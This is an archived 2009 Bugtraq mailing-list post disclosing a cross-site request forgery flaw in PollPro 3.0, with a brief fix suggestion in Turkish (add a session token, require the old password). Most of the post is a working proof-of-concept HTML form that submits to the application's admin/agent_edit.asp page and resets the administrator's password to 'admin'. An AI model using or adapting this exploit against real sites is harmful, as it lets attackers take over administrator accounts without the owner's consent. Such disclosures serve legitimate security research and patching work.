| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090103220259.10990.qmail@securityfocus.com>
Date: 3 Jan 2009 22:02:59 -0000
From: b4DchiLd@....Com
To: bugtraq@...urityfocus.com
Subject: PollPro 3.0 XSRF VuLn.
< ------------------- header data start ------------------- >
#############################################################
# Application Name : PollPro
# Vulnerable Type : XSRF
# Infection : Uzaktan otomatik olarak admin pass change edilebilir.
# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski şifre sorulmalıdır.
# author : The_0nur-n0x
#############################################################
< ------------------- header data end of ------------------- >
<tr>
<th0x>
<td>
<br />
<form action="http://Site.net/PATH/admin/agent_edit.asp?ID=USERID" name="frm" method="post" onSubmit="return Th30nur()">
<table cellpadding="2" cellspacing="0" border="0" align="center"><tr>
<td>Username:</td>
<td><input style="width: 400px;" type="Text" disabled="disabled" name="username" value="admin" size="45" maxlength="25" class="textbox" /></td>
</tr><tr>
<td>Password:</td>
<td><input style="width: 400px;" type="Password" name="password" size="45" value="admin" maxlength="25" class="textbox" /></td>
</tr><tr>
<td>Name:</td>
<td><input style="width: 400px;" type="Text" name="name" size="45" value="Admin User" maxlength="80" class="textbox" /></td>
</tr><tr>
<td>Enabled:</td>
<td><input type="Checkbox" name="enable" checked value="1" /></td>
</tr><tr>
<td colspan="2" align="right"><br /><input type="Submit" value="Update" /></td>
</tr></table>
<input type="Hidden" name="mode" value="edit" />
</form>
<br />
</td>
</tr></table></th0x>
Powered by blists - more mailing lists